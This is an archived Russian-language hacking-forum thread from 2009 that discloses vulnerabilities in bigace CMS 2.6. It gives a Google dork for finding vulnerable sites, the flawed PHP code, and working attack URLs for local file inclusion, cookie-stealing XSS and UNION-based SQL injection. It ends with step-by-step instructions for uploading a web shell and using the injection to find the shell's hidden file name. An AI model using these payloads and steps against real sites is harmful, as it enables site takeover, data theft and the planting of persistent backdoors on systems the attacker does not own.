ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Уязвимости bigace CMS 2.6
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости bigace CMS 2.6
  #1  
Старый 23.10.2009, 14:08
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Уязвимости bigace CMS 2.6
Уязвимости bigace CMS 2.6

Product: bigace CMS
Version: 2.6
Dork: "Powered by BIGACE 2.6"
Site: www.bigace.de
Found by: Dimi4
Date: 23.10.09

Local File Inclusion
/public/index.php : 78 line

PHP код:
// PROCESSING COMMAND INTERPRETER
        $COMMAND_FILE _BIGACE_DIR_ROOT '/system/command/' $GLOBALS['_BIGACE']['PARSER']->getCommand() . '.cmd.php';
        if ( file_exists($COMMAND_FILE) )
        {
            include_once ($COMMAND_FILE); 
Need: magic_quotes_gpc = OFF


Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=[evil_file].php%00&id=tpl-frameset_tADMIN_len

Cross Site Scripting

Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=tpl-frameset_tADMIN_len%3Cscript%3Ealert(document.cookie)%3C/script%3E
При просмотре логов, сработает алерт (http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=[id])

SQL-injection
Вы скажите да нахера нам скуля, если в админке уже? Так вот, для того чтобы узнать имя нашего шелла.

system/admin/plugins/logging.php : 76 line

PHP код:
if(isset($_GET['view']))
{
    $values = array(
                    'ORDER_BY'          => '',
                    'LIMIT'             => '',
                    'WHERE_EXTENSION'   => " AND id='".$_GET['view']."'"
    );
    
    $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->loadStatement('logging_filter');
    $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sqlString$values);
    $entry $GLOBALS['_BIGACE']['SQL_HELPER']->execute($sqlString);
    $entry $entry->next(); 
Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=[id]--+
Пошаговая заливка шелла:

В админке:
1. Идем в заливку файлов. Грузим свой шелл. Проверки на расширение нет. В результате получаем ИД, запоминаем. (Например ИД=3)
2. С помощю скули получаем зашифрованое имя шелла:
Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=3--+
3. Получили допустим e449d2128602875bd6c84284a3458a42_1256285544.php

Идем в
http://localhost/test/bigace_2.6/consumer/cid1/items/file/[name]
Последний раз редактировалось Jokester; 23.04.2010 в 15:45..
 
Ответить с цитированием

  #2  
Старый 23.04.2010, 15:48
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
слив РОА
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как определить вид CMS или форума? Validol Сценарии/CMF/СMS 1 14.09.2009 14:24
10 вещей, которые нужно учитывать при выборе идеальной CMS Andres Статьи 0 27.06.2009 02:38
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ